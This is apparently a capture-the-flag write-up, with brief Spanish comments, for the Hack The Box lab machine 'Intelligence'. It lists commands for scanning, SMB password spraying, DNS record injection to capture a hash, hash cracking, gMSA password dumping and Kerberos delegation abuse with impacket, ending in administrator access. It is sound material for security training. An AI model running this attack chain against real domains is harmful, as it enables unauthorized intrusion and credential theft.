echo "10.129.95.154  intelligence.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA intelligence 10.129.95.154 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210716062727.png

nmap -sC -sV -O -p- -oA intelligence 10.129.95.154

nmap -sU -O -p- -oA intelligence-udp 10.129.95.154

nikto -h 10.129.95.154:80

gobuster dir -k -u http://10.129.95.154/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210716062455.png

strings 2020-01-01-upload.pdf

Pasted image 20210716062932.png

Pasted image 20210716064007.png

cat users

Pasted image 20210716070001.png

Encontramos la contraseña NewIntelligenceCorpUser9876.

Pasted image 20210716065514.png

crackmapexec smb 10.129.95.154 -u users -p NewIntelligenceCorpUser9876

Pasted image 20210716070221.png

smbclient -L 10.129.95.154/ -U Tiffany.Molina

Pasted image 20210716070457.png

smbclient -L //10.129.95.154/ -U Tiffany.Molina

smbclient //10.129.95.154/IT -U Tiffany.Molina

Pasted image 20210716071602.png

cat downdetector.ps1

Pasted image 20210716071719.png

Tenemos que registrar nuestro dominio falso en el DNS (con las credenciales de Tiffany.Molina) para poder conseguir acceso de root. Vemos al usuario Ted Graves.

python3 dnstool.py -u "intelligence.htb\Tiffany.Molina" -p NewIntelligenceCorpUser9876 -a add -r webfake.intelligence.htb --data 10.10.14.94 10.129.95.154

Pasted image 20210716073523.png

hashid intelligence_hash.txt

Pasted image 20210716075309.png

john --wordlist=/usr/share/wordlists/rockyou.txt intelligence_hash.txt

Pasted image 20210716075703.png

hashcat -a 3 -m 5600 intelligence_hash.txt /usr/share/wordlists/rockyou.txt --show

Pasted image 20210716075855.png

python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb

Pasted image 20210716080634.png

python3 /opt/impacket/examples/getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83... -impersonate administrator

Pasted image 20210716081100.png

python3 /opt/impacket/examples/atexec.py -k -no-pass dc.intelligence.htb -hashes 'whoami'

Pasted image 20210716081438.png

python3 /opt/impacket/examples/smbclient.py -k intelligence.htb/Administrator@dc.intelligence.htb -no-pass

Pasted image 20210724064023.png
